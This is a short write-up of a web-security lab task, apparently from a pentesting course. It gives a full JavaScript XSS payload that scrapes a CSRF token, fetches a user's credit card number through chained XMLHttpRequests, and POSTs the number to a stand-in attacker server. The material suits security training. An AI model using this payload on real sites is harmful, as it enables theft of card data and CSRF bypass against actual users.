Task 19 [Try Now]
Objectives
- Find John's Credit Card Number using an XSS vulnerability on this page
- Display the Credit Card Number in the div with id "result"
- Post the Credit Card Number to a simulated Attacker Server
- No Hardcoded values can be used - everything has to be figured out dynamically
So in this we have to find the credit card value, print it to <div id="result">...</div> and POST it to the attacker's server
Well let me tell in you in advance, the payload for this task would be very lengthy 😛
So here we have a link, when you will click, it will redirect you to new page where after entering the UID you can see the credit card number
The credit card is in <div id="result">....</div>
So let's use our old XHR friend and complete this task. BTW the regex used are /<input type="hidden" value="(.+?)" .+>/ and /<div id="result">(.+?)<\/div>/
let a = document.querySelector("a");
let uid = a.innerText.trim().slice(-4);
const xhttp1 = new XMLHttpRequest();
xhttp1.onreadystatechange = function () {
if (xhttp1.readyState == 4 && xhttp1.status == 200) {
const xhttp2 = new XMLHttpRequest();
let tok = /<input type="hidden" value="(.+?)" .+>/.exec(this.responseText)[1];
xhttp2.onreadystatechange = function () {
if (xhttp2.readyState == 4 && xhttp2.status == 200) {
let cc = /<div id="result">(.+?)<\/div>/.exec(xhttp2.responseText)[1];
document.querySelector("#result").innerText = cc;
const xhttp3 = new XMLHttpRequest();
xhttp3.open("POST", "https://my-attacker.site", true);
xhttp3.send("cc=" + cc);
}
};
xhttp2.open("GET", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/19/getcreditcard?uid=" + uid + "&csrf_token=" + tok, true);
xhttp2.send();
}
};
xhttp1.open("GET", a.href, true);
xhttp1.send();Since we don't have worry about the delivery of the Credit Card on attacker site, to I am not using any .onreadystagechange callback
For POC, Click Here